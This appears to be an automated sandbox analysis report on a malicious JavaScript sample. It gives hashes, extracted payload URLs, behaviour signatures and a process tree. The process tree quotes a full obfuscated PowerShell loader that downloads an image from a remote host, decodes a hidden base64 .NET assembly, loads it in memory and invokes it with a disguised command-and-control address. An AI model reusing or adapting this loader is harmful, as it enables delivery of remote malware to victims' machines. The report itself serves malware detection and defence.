Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 03:15
Static task
static1
Behavioral task
behavioral1
Sample
7a9213f8719cf4d04d44e17846fd121c58a3f6d4bf1ffe834836c8ae746b248b.js
Resource
win7-20240903-en
General
-
Target
7a9213f8719cf4d04d44e17846fd121c58a3f6d4bf1ffe834836c8ae746b248b.js
-
Size
73KB
-
MD5
3c59d737f35d68bbe2e3b439f5b2721e
-
SHA1
348a45200e40b92d6568dfbd84645da895d071e2
-
SHA256
7a9213f8719cf4d04d44e17846fd121c58a3f6d4bf1ffe834836c8ae746b248b
-
SHA512
0b73c8d15fda1e90e7a892c33716e0393ca51a24d404a1ba2146988d2dcab7b9889fd331ca8a1644d6e299d80f3dfb29079ebfc6bce7ac409105d4e7473f84c5
-
SSDEEP
1536:0Q4izQ6VsYW/t5JKtxG+B5jIWiHKHmdcAEGM6vax:0OzQ6Vi/vdPk
Malware Config
Extracted
https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20
https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2680 powershell.exe 6 2680 powershell.exe -
pid Process 2680 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1344 wrote to memory of 2680 1344 wscript.exe 28 PID 1344 wrote to memory of 2680 1344 wscript.exe 28 PID 1344 wrote to memory of 2680 1344 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7a9213f8719cf4d04d44e17846fd121c58a3f6d4bf1ffe834836c8ae746b248b.js1⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.ennada/az.oc.secnailppanednil//:sp##h';$restoredText = $originalText -replace '#', 't';$vilifiers = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$hemichannels = New-Object System.Net.WebClient;$osteogenesy = $hemichannels.DownloadData($vilifiers);$rescindable = [System.Text.Encoding]::UTF8.GetString($osteogenesy);$phytotoxic = '<<BASE64_START>>';$Homberg = '<<BASE64_END>>';$committed = $rescindable.IndexOf($phytotoxic);$rhamphodon = $rescindable.IndexOf($Homberg);$committed -ge 0 -and $rhamphodon -gt $committed;$committed += $phytotoxic.Length;$dyotheletian = $rhamphodon - $committed;$gradualistic = $rescindable.Substring($committed, $dyotheletian);$quadropole = -join ($gradualistic.ToCharArray() | ForEach-Object { $_ })[-1..-($gradualistic.Length)];$phosphorical = [System.Convert]::FromBase64String($quadropole);$aegophony = [System.Reflection.Assembly]::Load($phosphorical);$stolonization = [dnlib.IO.Home].GetMethod('VAI');$stolonization.Invoke($null, @($restoredText, 'palatines', 'palatines', 'palatines', 'MSBuild', 'palatines', 'palatines','palatines','palatines','palatines','palatines','palatines','1','palatines','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-